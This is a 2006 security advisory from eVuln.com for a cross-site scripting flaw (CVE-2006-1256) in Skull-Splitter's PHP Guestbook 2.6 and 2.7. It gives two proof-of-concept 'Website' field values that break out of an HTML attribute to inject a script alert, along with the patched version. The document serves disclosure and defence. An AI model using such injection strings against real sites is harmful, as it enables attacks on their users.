XSS Vulnerability in Skull-Splitter PHP Guestbook

Summary

Vulnerability
XSS Vulnerability in Skull-Splitter PHP Guestbook
Discovered
2006.03.17
Last Update
2006.03.27 Exploitation code published
ID
EV0104
CVE
CVE-2006-1256
Risk Level
low
Type
Cross Site Scripting
Status
Patched
Vendor
n/a
Vulnerable Software
Skull-Splitter's PHP Guestbook (http://www.boysen.be/)
Version
2.6 2.7
PoC/Exploit
Available
Solution
Available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Cross Site Scripting found in Skull-Splitter's PHP Guestbook (http://www.boysen.be/) script.

Vulnerable Script: guestbook.php

Parameter url isn't properly sanitized. This can be used to post arbitrary HTML or JavaScript code.

Condition: magic_quotes_gpc = off

PoC/Exploit

Cross-Site Scripting Example:

Version 2.6

URL: http://[host]/guestbook.php?part=add_form
Website: aaa"><script>alert("Vulnerable")</script><aaa a="


Version 2.7

URL: http://[host]/guestbook.php?part=add_form
Website: http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com

Solution.

To fix this problem install or upgrade to 2.75 version provided by vendor.

Order Source Code Analysis

Prevent attacks by source code analysis of your website made by our team.The work will be done by experts in web security.

Website Monitoring

Daily malware scanning. Allows to receive alerts about security problems in your website.
Details >>

Malicious redirects detected?

eVuln team will eliminate the reason, clean your website and monitor it.
Details >>

Website blacklisted?

eVuln team will clean your website, discover and fix security holes, remove from blacklists.
Details >>